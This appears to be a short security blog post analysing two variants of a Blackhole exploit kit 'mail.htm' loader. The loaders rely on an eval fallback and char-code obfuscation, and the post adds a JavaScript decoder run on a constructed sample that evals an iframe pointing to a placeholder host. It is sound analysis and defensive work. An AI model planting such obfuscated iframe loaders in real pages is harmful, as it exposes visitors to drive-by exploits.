Blackhole Exploit Please Wait Page

Today, Polonus reported 2 Blackhole exploit sites here. Lets examine them. First, maolinsh:

Blackhole Exploit For mail.htm Variant 1

So it tries to define n^ as eval, only to fail, so execution falls through to the catch block. The catch statement uses the generic zxc identifier that lots of Blackhole variants share. It defines n as an array of numbers, then loops through it, appending each value to s via the fromCharCode() function. Finally, two if statements that will evaluate to true 99.9% of the time tell the browser to run the s string as JavaScript code (using eval).

Next up, destroya:

Blackhole Exploit For mail.htm Variant 2

This one is the same as Variant 1, apart from a few differences. Variant 2 tries to define a variable as eval's prototype. The second if statement featured in Variant 1 is also not present.

Both of these scripts deobfuscate to an iframer pointing at a Blackhole exploit hotspot. Both of these files are named mail.htm. Searching on CleanMX reveals that there are others out there. Here is an example VirusTotal result. Only 2 detect.
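An added example (not the post's own code, and not the kit's) of how an analyst can decode the "array of char codes + fromCharCode loop + eval" pattern described for both variants above without ever running the script: it pulls the numeric array out statically, rebuilds the string, and reports the iframe target. SAMPLE is a constructed stand-in for mail.htm with a placeholder hostname, not the real file.

```javascript
// Constructed stand-in for the obfuscated mail.htm loader: a try that fails,
// a catch (zxc) holding the numeric array, the fromCharCode loop, and the
// always-true if guards in front of eval. The hostname is a placeholder.
const SAMPLE =
  'try{n^=eval}catch(zxc){' +
  'var n=[60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,' +
  '120,46,105,110,118,97,108,105,100,47,105,110,46,112,104,112,34,62,60,47,105,' +
  '102,114,97,109,101,62];' +
  'var s="";for(var i=0;i<n.length;i++){s+=String.fromCharCode(n[i]);}' +
  'if(1<2)if(zxc)window["eval"](s);}';

// Pull out the longest bracketed list of integers; these loaders keep the
// whole payload in one such array, so the longest one is the payload.
function extractCharCodeArray(script) {
  const lists = [...script.matchAll(/\[\s*(\d+(?:\s*,\s*\d+)*)\s*\]/g)]
    .map(m => m[1].split(',').map(x => parseInt(x.trim(), 10)));
  if (lists.length === 0) return null;
  return lists.reduce((a, b) => (b.length > a.length ? b : a));
}

// Rebuild the string the loop would have built, without running the loop.
function decodeCharCodes(codes) {
  return codes.map(c => String.fromCharCode(c)).join('');
}

// Static triage: does the script carry the try/catch-to-eval shape, and does
// the decoded payload inject an iframe? The src is what you would blocklist.
function analyse(script) {
  const codes = extractCharCodeArray(script);
  if (!codes) return { obfuscated: false };
  const decoded = decodeCharCodes(codes);
  const usesEvalFallback = /catch\s*\([^)]*\)/.test(script) && /eval/.test(script);
  const src = decoded.match(/<iframe[^>]*\ssrc=["']([^"']+)["']/i);
  return {
    obfuscated: true,
    usesEvalFallback,
    decoded,
    iframeInjector: src !== null,
    iframeSrc: src ? src[1] : null,
  };
}

console.log(JSON.stringify(analyse(SAMPLE), null, 2));
```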

Be prepared,
~!Donovan